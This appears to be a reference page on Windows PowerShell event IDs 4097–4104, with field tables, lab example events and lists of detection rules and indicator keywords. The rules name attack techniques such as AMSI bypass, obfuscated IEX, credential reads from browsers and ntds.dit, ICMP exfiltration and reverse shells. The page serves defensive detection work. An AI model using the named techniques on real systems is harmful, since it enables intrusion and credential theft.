Microsoft-Windows-PowerShell
189 events across 3 channels
Event ID 4097: Computer Name $null or.
#Description
Computer Name $null or . resolve to LocalHost.
Message #
Event ID 4098: Resolving to default scheme http
#Description
Resolving to default scheme http.
Message #
Event ID 4099: Remote shell name resolved to default Microsoft.
#Description
Remote shell name resolved to default Microsoft.PowerShell.
Message #
Event ID 4100: Payload Context: ContextInfo User Data: UserData.
#Description
Payload Context: ContextInfo User Data: UserData
Message #
Fields #
| Name | Description |
|---|---|
ContextInfo UnicodeString | Context |
UserData UnicodeString | |
Payload UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 4100,
"version": 1,
"level": 3,
"task": 106,
"opcode": 19,
"keywords": 0,
"time_created": "2026-06-13T05:24:22.6461352+00:00",
"event_record_id": 164816,
"correlation": {
"ActivityID": "{AA583517-FAF4-0001-383A-58AAF4FADC01}"
},
"execution": {
"process_id": 7180,
"thread_id": 7444
},
"channel": "Microsoft-Windows-PowerShell/Operational",
"computer": "telemetry-DC-c.cell-c.ludus.domain",
"security": {
"user_id": "S-1-5-21-1006758700-2167138679-1475694448-1105"
}
},
"event_data": {
"ContextInfo": " Severity = Warning\n Host Name = ConsoleHost\n Host Version = 5.1.20348.558\n Host ID = f5117d22-3ce1-45ff-8086-de5eb4591327\n Host Application = C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy Bypass -NonInteractive -File C:\\ludus\\background\\set-bg.ps1\n Engine Version = 5.1.20348.558\n Runspace ID = d45fbe4a-06f2-475d-a9db-ab9fc6584c17\n Pipeline ID = 1\n Command Name = \n Command Type = \n Script Name = \n Command Path = \n Sequence Number = 19\n User = cell-c\\domainadmin\n Connected User = \n Shell ID = Microsoft.PowerShell\n",
"UserData": "",
"Payload": "Error Message = System error.\n"
},
"message": "Error Message = System error.\r\n\r\n\r\nContext:\r\n Severity = Warning\r\n Host Name = ConsoleHost\r\n Host Version = 5.1.20348.558\r\n Host ID = f5117d22-3ce1-45ff-8086-de5eb4591327\r\n Host Application = C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy Bypass -NonInteractive -File C:\\ludus\\background\\set-bg.ps1\r\n Engine Version = 5.1.20348.558\r\n Runspace ID = d45fbe4a-06f2-475d-a9db-ab9fc6584c17\r\n Pipeline ID = 1\r\n Command Name = \r\n Command Type = \r\n Script Name = \r\n Command Path = \r\n Sequence Number = 19\r\n User = cell-c\\domainadmin\r\n Connected User = \r\n Shell ID = Microsoft.PowerShell\r\n\r\n\r\nUser Data:\r\n\r\n"
}
Event ID 4101: Payload Context: ContextInfo User Data: UserData.
#Description
Payload Context: ContextInfo User Data: UserData
Message #
Fields #
| Name | Description |
|---|---|
ContextInfo UnicodeString | |
UserData UnicodeString | |
Payload UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "A0C1853B-5C40-4B15-8766-3CF1C58F985A",
"event_source_name": "",
"event_id": 4101,
"version": 1,
"level": 4,
"task": 0,
"opcode": 19,
"keywords": 9223372036854775840,
"time_created": "2026-03-13T19:32:29.608586+00:00",
"event_record_id": 149117,
"correlation": {
"ActivityID": "DF92C490-B30B-000C-6802-93DF0BB3DC01"
},
"execution": {
"process_id": 4068,
"thread_id": 956
},
"channel": "Microsoft-Windows-PowerShell/Operational",
"computer": "LAB-WIN11.ludus.domain",
"security": {
"user_id": "S-1-5-21-1006758700-2167138679-1475694448-1105"
}
},
"event_data": {
"ContextInfo": "Install",
"UserData": "Package=nuget, Version=2.8.5.208, Provider=Bootstrap, Source=https://cdn.oneget.org/providers/nuget-2.8.5.208.package.swidtag, Status=Installed, DestinationPath=",
"Payload": "PackageManagement: A package is installed."
},
"message": ""
}
Event ID 4102: Payload Context: ContextInfo User Data: UserData.
#Description
Payload Context: ContextInfo User Data: UserData
Message #
Fields #
| Name | Description |
|---|---|
ContextInfo UnicodeString | Context |
UserData UnicodeString | |
Payload UnicodeString |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 4102,
"version": 1,
"level": 3,
"task": 106,
"opcode": 19,
"keywords": 0,
"time_created": "2026-06-13T14:36:40.9609813+00:00",
"event_record_id": 291397,
"correlation": {
"ActivityID": "{C6821FB2-EF88-0004-5018-83C688EFDC01}"
},
"execution": {
"process_id": 1152,
"thread_id": 8008
},
"channel": "Microsoft-Windows-PowerShell/Operational",
"computer": "telemetry-DC-a.cell-a.ludus.domain",
"security": {
"user_id": "S-1-5-21-1006758700-2167138679-1475694448-1105"
}
},
"event_data": {
"ContextInfo": " Severity = Warning\n Host Name = ServerRemoteHost\n Host Version = 1.0.0.0\n Host ID = e8ecf392-16f7-461a-9e04-2cf3b693e616\n Host Application = C:\\Windows\\system32\\wsmprovhost.exe -Embedding\n Engine Version = 5.1.20348.558\n Runspace ID = 7d22a55e-f35a-436b-aadc-c65ab73a8891\n Pipeline ID = 4684\n Command Name = \n Command Type = \n Script Name = \n Command Path = \n Sequence Number = 82234\n User = cell-a\\domainadmin\n Connected User = cell-a\\domainadmin\n Shell ID = Microsoft.PowerShell\n",
"UserData": "",
"Payload": "Error Message = Could not find the drive 'Z:\\'. The drive might not be ready or might not be mapped.\n\nProvider name = Microsoft.PowerShell.Core\\FileSystem\n"
},
"message": "Error Message = Could not find the drive 'Z:\\'. The drive might not be ready or might not be mapped.\r\n\r\nProvider name = Microsoft.PowerShell.Core\\FileSystem\r\n\r\n\r\nContext:\r\n Severity = Warning\r\n Host Name = ServerRemoteHost\r\n Host Version = 1.0.0.0\r\n Host ID = e8ecf392-16f7-461a-9e04-2cf3b693e616\r\n Host Application = C:\\Windows\\system32\\wsmprovhost.exe -Embedding\r\n Engine Version = 5.1.20348.558\r\n Runspace ID = 7d22a55e-f35a-436b-aadc-c65ab73a8891\r\n Pipeline ID = 4684\r\n Command Name = \r\n Command Type = \r\n Script Name = \r\n Command Path = \r\n Sequence Number = 82234\r\n User = cell-a\\domainadmin\r\n Connected User = cell-a\\domainadmin\r\n Shell ID = Microsoft.PowerShell\r\n\r\n\r\nUser Data:\r\n\r\n"
}
Event ID 4103: Payload Context: ContextInfo User Data: UserData.
#Description
Payload Context: ContextInfo User Data: UserData
Message #
Fields #
| Name | Description | Rules |
|---|---|---|
ContextInfo UnicodeString | Context | 315 |
UserData UnicodeString | ||
Payload UnicodeString | 400 |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 4103,
"version": 1,
"level": 4,
"task": 106,
"opcode": 20,
"keywords": 0,
"time_created": "2026-06-13T14:11:14.9015833+00:00",
"event_record_id": 168285,
"correlation": {
"ActivityID": "{AA583517-FAF4-0000-BF5D-58AAF4FADC01}"
},
"execution": {
"process_id": 7864,
"thread_id": 1248
},
"channel": "Microsoft-Windows-PowerShell/Operational",
"computer": "telemetry-DC-c.cell-c.ludus.domain",
"security": {
"user_id": "S-1-5-21-1006758700-2167138679-1475694448-1105"
}
},
"event_data": {
"ContextInfo": " Severity = Informational\n Host Name = ServerRemoteHost\n Host Version = 1.0.0.0\n Host ID = aa212afc-f66e-4e09-a428-4989b19010a1\n Host Application = C:\\Windows\\system32\\wsmprovhost.exe -Embedding\n Engine Version = 5.1.20348.558\n Runspace ID = 55ce38e0-81ea-44db-9a08-0c9965b78525\n Pipeline ID = 10\n Command Name = ConvertTo-Json\n Command Type = Cmdlet\n Script Name = \n Command Path = \n Sequence Number = 52\n User = cell-c\\domainadmin\n Connected User = cell-c\\domainadmin\n Shell ID = Microsoft.PowerShell\n",
"UserData": "",
"Payload": "CommandInvocation(ConvertTo-Json): \"ConvertTo-Json\"\nParameterBinding(ConvertTo-Json): name=\"Depth\"; value=\"14\"\nParameterBinding(ConvertTo-Json): name=\"Compress\"; value=\"True\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\n"
},
"message": "CommandInvocation(ConvertTo-Json): \"ConvertTo-Json\"\r\nParameterBinding(ConvertTo-Json): name=\"Depth\"; value=\"14\"\r\nParameterBinding(ConvertTo-Json): name=\"Compress\"; value=\"True\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\n\r\n\r\nContext:\r\n Severity = Informational\r\n Host Name = ServerRemoteHost\r\n Host Version = 1.0.0.0\r\n Host ID = aa212afc-f66e-4e09-a428-4989b19010a1\r\n Host Application = C:\\Windows\\system32\\wsmprovhost.exe -Embedding\r\n Engine Version = 5.1.20348.558\r\n Runspace ID = 55ce38e0-81ea-44db-9a08-0c9965b78525\r\n Pipeline ID = 10\r\n Command Name = ConvertTo-Json\r\n Command Type = Cmdlet\r\n Script Name = \r\n Command Path = \r\n Sequence Number = 52\r\n User = cell-c\\domainadmin\r\n Connected User = cell-c\\domainadmin\r\n Shell ID = Microsoft.PowerShell\r\n\r\n\r\nUser Data:\r\n\r\n"
}
Detection Patterns #
132 rules
Sigma
Common Indicators #
Field/value combinations most frequently checked by detection rules targeting this event, derived from cross-vendor predicate analysis.
| Field | Kind | Value | Rules | Vendors |
|---|---|---|---|---|
EventData | contains | -itemproperty | 5 rules | sigma |
Payload | contains | -itemproperty | 5 rules | sigma |
ScriptBlockText | contains | -itemproperty | 5 rules | sigma |
signature_id | eq | 4104 | 4 rules | splunk |
EventData | contains | set-mppreference | 3 rules | sigma |
ScriptBlockText | contains | name | 3 rules | sigma |
EventData | contains | .dll | 3 rules | sigma |
EventData | contains | name | 3 rules | sigma |
Payload | contains | .dll | 3 rules | sigma |
Payload | contains | name | 3 rules | sigma |
ScriptBlockText | contains | .dll | 3 rules | sigma |
CommandLine | match | (?i)\w+tps?://\S+\.msi | 2 rules | splunk |
process_name | match | (?i)hh\.exe | 2 rules | splunk |
EventData | contains | add-mppreference | 2 rules | sigma |
ScriptBlockText | contains | set-mppreference | 2 rules | sigma |
Detection Rules #
View all rules referencing this event →
Sigma # view in coverage
- Potential Active Directory Enumeration Using AD Module - PsModule source medium: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration.
- Alternate PowerShell Hosts - PowerShell Module source medium: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe
- Bad Opsec Powershell Code Artifacts source critical: focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including Cobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads that often undergo minimal changes by attackers due to bad opsec.
Show 17 more (34 total)
- Clear PowerShell History - PowerShell Module source medium: Detects keywords that could indicate clearing PowerShell history
- PowerShell Decompress Commands source informational: A General detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files.
- Malicious PowerShell Scripts - PoshModule source high: Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance
- Suspicious Get-ADDBAccount Usage source high: Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers
- PowerShell Get Clipboard source medium: A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.
- HackTool - Evil-WinRm Execution - PowerShell Module source high: Detects the execution of Evil-WinRM via PowerShell Module logs by leveraging the hardcoded strings inside the utility.
- Invoke-Obfuscation CLIP+ Launcher - PowerShell Module source high: Detects Obfuscated use of Clip.exe to execute PowerShell
- Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module source high: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below
- Invoke-Obfuscation STDIN+ Launcher - PowerShell Module source high: Detects Obfuscated use of stdin to execute PowerShell
- Invoke-Obfuscation VAR+ Launcher - PowerShell Module source high: Detects Obfuscated use of Environment Variables to execute PowerShell
- Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module source medium: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
- Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module source medium: Detects Obfuscated Powershell via RUNDLL LAUNCHER
- Invoke-Obfuscation Via Stdin - PowerShell Module source high: Detects Obfuscated Powershell via Stdin in Scripts
- Invoke-Obfuscation Via Use Clip - PowerShell Module source high: Detects Obfuscated Powershell via use Clip.exe in Scripts
- Invoke-Obfuscation Via Use MSHTA - PowerShell Module source high: Detects Obfuscated Powershell via use MSHTA in Scripts
- Invoke-Obfuscation Via Use Rundll32 - PowerShell Module source high: Detects Obfuscated Powershell via use Rundll32 in Scripts
- Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module source high: Detects Obfuscated Powershell via VAR++ LAUNCHER
Splunk # view in coverage
- Command-Line Interface Execution (PowerShell) source: Detects when a Command-Line Interface executes on a host
- Command Line Utility Added to Accessibility Features (PowerShell) source: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has…
- MSHTA.exe execution (PowerShell) source: Detect use of MSHTA
Show 6 more (9 total)
- Obfuscated Powershell Techniques (PowerShell) source: Attackers and commodity malware have started using extremely basic obfuscation techniques to hide the majority of the command from the command line arguments of powershell.exe. This use case relies on URL Toolbox to function
- PowerHuntShares Commands (PowerShell) source: Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks…
- Powershell ICMP Data Exfiltration (PowerShell) source: Adversaries may steal data by exfiltrating it over an existing command and control channel. Use case attempts to detect powershell scripts with specific ICMP calls that may be attributed to data exfil
- Suspicious AteraAgent Installation - Windows (PowerShell) source: An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These remote monitoring and management (RMM) tools, such as AteraAgent,…
- Suspicious Powershell (PowerShell) source: PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary. This use case attempts to identify those powershell executions launched by a binary other than powershell
- WebLogic CVE-2017-10271 (PowerShell) source: A reverse shell is a shell session established on a connection that is initiated from a remote machine, not from the local host and in this case the session is created using the vulnerability of Weblogic app - wls-wsat Component…
References #
Event ID 4104: Creating Scriptblock text (MessageNumber of MessageTotal).
#Description
Creating Scriptblock text (MessageNumber of MessageTotal).
Message #
Fields #
| Name | Description | Rules |
|---|---|---|
MessageNumber Int32 | Part number of the current script block fragment (large scripts are split across multiple events) | |
MessageTotal Int32 | Total number of script block fragments for the complete script | |
ScriptBlockText UnicodeString | Content of the executed PowerShell script block | 1883 |
ScriptBlockId UnicodeString | ScriptBlock ID. | |
Path UnicodeString | Full path to the executed script file | 3 |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 4104,
"version": 1,
"level": 5,
"task": 2,
"opcode": 15,
"keywords": 0,
"time_created": "2026-06-13T14:11:14.9274534+00:00",
"event_record_id": 168286,
"correlation": {
"ActivityID": "{AA583517-FAF4-0004-3DE7-58AAF4FADC01}"
},
"execution": {
"process_id": 7864,
"thread_id": 7844
},
"channel": "Microsoft-Windows-PowerShell/Operational",
"computer": "telemetry-DC-c.cell-c.ludus.domain",
"security": {
"user_id": "S-1-5-21-1006758700-2167138679-1475694448-1105"
}
},
"event_data": {
"MessageNumber": "1",
"MessageTotal": "1",
"ScriptBlockText": "Export-XmlVrecEvents -Channel 'Microsoft-Windows-LSA/Operational' -Max 8000",
"ScriptBlockId": "f8e011c2-f02d-4ac3-9cd6-a7d76a3309eb",
"Path": ""
},
"message": "Creating Scriptblock text (1 of 1):\r\nExport-XmlVrecEvents -Channel 'Microsoft-Windows-LSA/Operational' -Max 8000\r\n\r\nScriptBlock ID: f8e011c2-f02d-4ac3-9cd6-a7d76a3309eb\r\nPath: "
}
Detection Patterns #
132 rules
Sigma
Common Indicators #
Field/value combinations most frequently checked by detection rules targeting this event, derived from cross-vendor predicate analysis.
| Field | Kind | Value | Rules | Vendors |
|---|---|---|---|---|
ScriptBlockText | contains | new-object | 8 rules | sigma, splunk |
ScriptBlockText | contains | get-wmiobject | 7 rules | sigma, splunk |
Esql.script_block_length | gt | 500 | 6 rules | elastic |
Esql.script_block_pattern_count | ge | 1 | 6 rules | elastic |
EventData | contains | -itemproperty | 5 rules | sigma |
Payload | contains | -itemproperty | 5 rules | sigma |
ScriptBlockText | contains | -itemproperty | 5 rules | sigma |
file.directory | is_null | | 5 rules | elastic |
ScriptBlockText | contains | frombase64string | 4 rules | sigma, splunk |
ScriptBlockText | contains | get-aduser | 4 rules | sigma, splunk |
ScriptBlockText | contains | invoke-restmethod | 4 rules | sigma, splunk |
ScriptBlockText | contains | get-childitem | 4 rules | sigma |
ScriptBlockText | contains | get-netuser | 4 rules | splunk |
ScriptBlockText | contains | name | 4 rules | sigma |
ScriptBlockText | eq | *[adsisearcher]* | 4 rules | splunk |
Detection Rules #
View all rules referencing this event →
Sigma # view in coverage
- AADInternals PowerShell Cmdlets Execution - PsScript source high: Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.
- Access to Browser Login Data source medium: Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store.
- Potential Active Directory Enumeration Using AD Module - PsScript source medium: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration.
Show 17 more (179 total)
- Powershell Add Name Resolution Policy Table Rule source high: Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace. This will bypass the default DNS server and uses a specified server for answering the query.
- Add Windows Capability Via PowerShell Script source medium: Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others.
- PowerShell ADRecon Execution source high: Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7
- AMSI Bypass Pattern Assembly GetType source high: Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts
- Potential AMSI Bypass Script Using NULL Bits source medium: Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities
- Silence.EDA Detection source critical: Detects Silence EmpireDNSAgent as described in the Group-IP report
- Get-ADUser Enumeration Using UserAccountControl Flags source medium: Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.
- Potential Data Exfiltration Via Audio File source medium: Detects potential exfiltration attempt via audio file using PowerShell
- Automated Collection Command PowerShell source medium: Once established within a system or network, an adversary may use automated techniques for collecting internal data.
- Windows Screen Capture with CopyFromScreen source medium: Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations
- Clear PowerShell History - PowerShell source medium: Detects keywords that could indicate clearing PowerShell history
- Clearing Windows Console History source high: Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.
- Powershell Create Scheduled Task source medium: Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code
- Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell source medium: Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file
- Powershell Install a DLL in System Directory source high: Uses PowerShell to install/copy a file into a system directory such as "System32" or "SysWOW64"
- Registry-Free Process Scope COR_PROFILER source medium: Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR. (Citation: Microsoft Profiling Mar 2017) (Citation: Microsoft COR_PROFILER Feb 2013)
- PowerShell Create Local User source medium: Detects creation of a local user via PowerShell
Elastic # view in coverage
